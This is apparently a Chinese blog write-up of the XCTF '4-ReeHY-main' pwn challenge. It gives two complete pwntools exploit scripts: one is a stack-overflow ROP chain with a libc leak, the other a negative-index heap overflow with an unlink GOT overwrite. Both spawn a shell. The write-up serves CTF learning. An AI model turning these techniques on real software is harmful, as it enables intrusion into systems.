XCTF攻防世界(2019Xman第一阶段练习赛) Pwn 4-ReeHY-main 两种解法

最新推荐文章于 2022-04-05 18:26:07 发布
最新推荐文章于 2022-04-05 18:26:07 发布
阅读量651 收藏 1
点赞数
分类专栏: CTF CTF Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaiKaiaiq/article/details/98493625
版权

 

一、栈溢出Getshell

分析

审计IDA代码,发现在create中存在栈溢出、类型转换漏洞。如下:

///栈空间布局  
  int result; // eax
  char buf; // [rsp+0h] [rbp-90h]
  void *dest; // [rsp+80h] [rbp-10h]
  int index; // [rsp+88h] [rbp-8h]
  size_t cin_num; // [rsp+8Ch] [rbp-4h]

1.逻辑漏洞,输入的nbytes可以<=0x1000

2.nbytes使用的eax,也就是四字节。

但在ssize_t read(int fd, void *buf, size_t nbytes)中,size_t 是无符号的,也就意味着,我们可以输入超长字符串。并在此覆盖栈空间。

3.我们必须要覆盖了cin_num,因为memcpy(dest, &buf, cin_num)的三个参数都需要为正常。既然覆盖,那么我们就需要填写上dest、index、cin_num;虽然这里也可以实现任意地址写,但是我们已经可以栈溢出控制程序流程咯。

利用

1.确定栈溢出中,dest、index、cin_num、ret的偏移。

2.找到需要的ROP,如:pop rdi,ret;若没有还有其他方法(这里就不说了)。构造payload,循环程序流程。

3.先泄漏libc地址,再计算出system、binsh的地址。Getshell。

Python脚本

from pwn import *

context.log_level="debug"

p=process("./4-ReeHY-main")
#p=remote("111.198.29.45",39294)
p.recvuntil("$")
p.sendline("kaller 2019")



def add_1(a,b,c):
    p.sendline("1")
    p.recvuntil("size\n")
    p.sendline(str(b))
    p.recvuntil("cun\n")
    p.sendline(str(a))
    p.recvuntil("content\n")
    p.send(c)



#--------------------list-------------------
puts_plt=0x00000000004006D0
free_got_addr=0x0000000000602018
read_got_addr=0x0000000000602030
main_call=0x0000000000400C8C
pop_rdi_ret=0x0000000000400da3
#-------------------------------------------

#
p.recvuntil("$")
payload="a"*(8*16)+p64(free_got_addr)+p32(0)+p32(8)+"\x00"*8
payload=payload+p64(pop_rdi_ret)+p64(read_got_addr)+p64(puts_plt)+p64(main_call)
add_1(0,-1,payload)
#-----------------libc_calc------------------
str_1=p.recvuntil("$")
leak_read_addr=u64(str_1[0:6]+"\x00\x00")
leak_system_addr=leak_read_addr-0xb1ec0
leak_binsh_addr=leak_read_addr+0x95b07
print "leak_read_addr=",hex(leak_read_addr)
#--------------------------------------------
#edb_attach()
p.sendline("zhukaikai")
p.recvuntil("$")
payload="a"*(8*16)+p64(free_got_addr)+p32(0)+p32(8)+"\x00"*8
payload=payload+p64(pop_rdi_ret)+p64(leak_binsh_addr)+p64(leak_system_addr)+p64(main_call)
add_1(0,-1,payload)




p.interactive()

二、Unlink漏洞

分析.

1.逻辑漏洞,添加时的index可以为负数。

2.List布局

00000000006020C0 list_size//存放malloc(0x14)_ptr
                    list_chunk     list_isUse
00000000006020E0   malloc()_ptr    0 or 1
----------------    ---------      --------

3.我们可以在添加功能中,使index=-2,这样list_size的内容就被我们任意控制,堆溢出。

4.既然实现了堆溢出,那么利用Unlink漏洞就可以实现任意地址写。

Python脚本.

from pwn import *
import os
context.log_level="debug"


p=process("./4-ReeHY-main")
#p=remote("111.198.29.45",39294)
p.recvuntil("$")
p.sendline("kaller 2019")
p.recvuntil("$")


def add_1(a,b,c):
    p.sendline("1")
    p.recvuntil("size\n")
    p.sendline(str(b))
    p.recvuntil("cun\n")
    p.sendline(str(a))
    p.recvuntil("content\n")
    p.send(c)
#set LD_PRELOAD="./libc.so.6"

def del_1(a):
    p.sendline("2")
    p.recvuntil("dele\n")
    p.sendline(str(a))

def edit_1(a,b):
    p.sendline("3")
    p.recvuntil("edit\n")
    p.sendline(str(a))
    p.recvuntil("content\n")
    p.send(b)



#--------------------list-------------------
puts_plt=0x00000000004006D0
free_got_addr=0x0000000000602018
read_got_addr=0x0000000000602030
main_call=0x0000000000400C8C
pop_rdi_ret=0x0000000000400da3
chunk_list_addr=0x006020e0
#-------------------------------------------



add_1(0,0x120,"a")
p.recvuntil("$")

add_1(1,0x120,"a")
p.recvuntil("$")

add_1(-2,0x50,p32(0x200)+p32(0x200))#控制list_size
p.recvuntil("$")



fake_chunk=p64(0)+p64(0)+p64(chunk_list_addr-0x18)+p64(chunk_list_addr-0x10)
payload=fake_chunk+('a'*(0x100))+p64(0x120)+p64(0x130)
edit_1(0,payload)#伪造堆块
p.recvuntil("$")

del_1(1)#触发Unlink()
p.recvuntil("$")
#这里已经可以任意地址写了。
payload="\x00"*0x18+p64(free_got_addr)+p64(1)+p64(read_got_addr)+p64(1)#写地址、
edit_1(0,payload)
p.recvuntil("$")

edit_1(0,p64(puts_plt))#写内容
p.recvuntil("$")

del_1(1)#泄漏read got中地址

#-----------------libc_calc------------------
str_1=p.recvuntil("$")
leak_read_addr=u64(str_1[0:6]+"\x00\x00")
leak_system_addr=leak_read_addr-0xb1ec0
leak_binsh_addr=leak_read_addr+0x95b07
print "leak_read_addr=",hex(leak_read_addr)
#--------------------------------------------

edit_1(0,p64(leak_system_addr))

add_1(2,0x50,"/bin/sh\x00")
p.recvuntil("$")
del_1(2)


p.interactive()

 

 

 

俺是大宝kaikaizhu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 4-ReeHY-main-100
BengDouLove的博客
04-01 772
本来想着做2018年的网鼎杯 pwn的,但是就算看了 wp也无法模仿着实现,所以就退而求其次先做一些堆的题吧 18年网鼎杯的pwn有个babyheap,里面用到的unlink我一直不懂,断链是知道咋实现的,但是到底有啥用真是不做题无法体会 然后在攻防世界找了一个pwn题,就是这道题,看了一个肥肠肥肠细致的博主的文章,收获颇多 传送门 下面我就记录一下,题的思路大致和这个博主一样,后面我自己发挥了一...
攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 386
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
攻防世界 4-ReeHY-main
weixin_30552811的博客
09-07 211
检查保护机制:    发现 可以好像写got 然后 程序流程 这里 有double free 然后 再发现 这里很有趣 ,要是我的content为零了 且size 小于112 那就从栈上copy一些内容进去 利用double free ,再修改残留在chunk上的fd的信息 就能达到任意地址...
xctf 4-ReeHY-main-100
发蝴蝶和大脑斧的博客
09-24 705
卡了很久,最后发现他给的libc有点问题,还是用libcsearcher找,贼坑。 参考:https://bbs.pediy.com/thread-218300.htm 首先是unlink修改free的got表为puts,泄露函数地址,然后修改free为system。 # -*- coding: utf-8 -*- from pwn import* from LibcSearcher imp...
XCTF攻防世界 4-ReeHY-main-100 题解
CoLin的pwn小屋
04-05 3689
XCTF 4-ReeHY-main-100 适用于最新版本libc的两种解题姿势
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,...MISC这一块并不像PWNREVERSE等需要深厚的理论基础,所以我们直接从经典题目开始入手。
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-Mobile】新手练习区-02-easy-dex.apk
08-16
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5089&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easydex
XCTF攻防世界web.doc
09-19
在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力。本WriteUp将详细解释如何在...
XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
PWN系列】XCTF-4-ReeHY-main-100 Writeup
Vicl1fe的博客
11-18 357
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/xingzherufeng/p/9885860.html#commentform https://blog.csdn.net/seaaseesa/article/details/102907138 分析 其实此题有两种解法,一个是整型溢出,一个是double free。因为暂时只搞懂了double free,先写double free的解法 运行程序大概可以看到
XCTF4-ReeHY-main-100
yms0211的博客
03-20 243
XCTF:4-ReeHY-main-100 这道题用来巩固一下之前学的unlink的利用方法 保护检查: checksec一下: 只开了NX,RELRO和PIE都没有开启,所以可以利用静态调试找出的地址来操作,并且可以使用GOT表覆盖这个技巧 程序分析: main函数: 代码如下: void __fastcall main(__int64 a1, char **a2, char **a3) { sub_400856(a1, a2, a3); while ( 1 ) { sub_4009
4-ReeHY-main-100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列22
重新启程
12-26 653
题目地址:4-ReeHY-main-100 本题是高手进阶区的第11题,已经逐步稳定在5颗星的难度级别了。 废话不说,看看题目先 照例检查一下保护机制: [*] '/ctf/work/python/4-ReeHY-main-100/4-ReeHY-main' Arch: amd64-64-little RELRO: Partial RELRO Sta...
4-ReeHY-main-100_最详细题解PWN
seaaseesa的博客
11-04 2152
Libc2.26以下的解法 使用的是double free的unlink漏洞 unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。 Unsorted bin使用双向链表维护被释放的空间,如果有一个堆块...
4-ReeHY-main-100 一道题学到了很多的知识
qq_41071646的博客
05-14 1273
先说一下参考链接 https://bbs.pediy.com/thread-218300.htm 然后这个题 其实可以按堆的解法来做 也可以按照 栈的解法来做 这个要看自己的做法了 然后我首先看的是堆的解法 一开始我的想法是 直接 double free直接 到 heap_user 但是失败了 然后看了这篇帖子感觉受益匪浅 然后写篇这个帖子来记录一下 ‘ 然后 那篇帖子其实讲的很明白 我...
CTF-PWN-4-ReeHY-main-100(堆溢出+double free+unlink)
SuperGate的博客
10-09 598
程序综述 题目包含了一个动态库.so文件和elf文件,checksec查看: supergate@ubuntu:~/Desktop/Pwn$ checksec pwn [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No can...
【CTF大赛】第五届XMan选拔赛 ezCM Writeup
HBohan的博客
08-12 871
ezCM 直至比赛结束,这道题目都是 0 解题,一方面是因为比赛时间较短,另一方面还是因为这道题目较难,考察了不常见的椭圆曲线算法(ECC),大大增加了对做题者的要求。 题目信息 题目是使用 Golang 来编写的一个 CrackMe 程序,程序内符号没有被去除,所以这篇文章就不会讲解如何恢复 Golang 程序符号,另外 IDA Pro 7.6 已经支持 Golang 程序分析,打开就可以直接恢复被去除的符号信息。 题目要求打开一个 KeyFile ,并且通过读取其文件的内容来注册程序,我们要做的就是通
4-ReeHY-main-double_free
playmaker的博客
06-15 441
4-ReeHY-main-double_free 拿到程序看一下保护和内容只开了NX保护 是一个有关于堆的创建删除编辑的程序。拿到程序寻找漏洞点。首先进入create函数 int result; // eax char buf; // [rsp+0h] [rbp-90h] void *dest; // [rsp+80h] [rbp-10h] int v3; // [rsp+8...
xmanctf_2019_crypto_cycle_write_up
WaterDemo22的专栏
12-31 553
一道xmanctf逆向题目的解答 周末试了试xmanctf的题目,试了一下crypto的cycle那一题,逻辑逆向难度不是很大。主要是对于逆向出来对逻辑,整理成解题思路的过程有点繁琐,需要对程序的精细化处理。分为三个步骤:编码、跳表处理和约束求解,具体分析如下。 编码 对输入字符进行编码,编码算法是: 关键逻辑是有两个: v2 = byte_202020[i] + v4 –s s[i]...
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值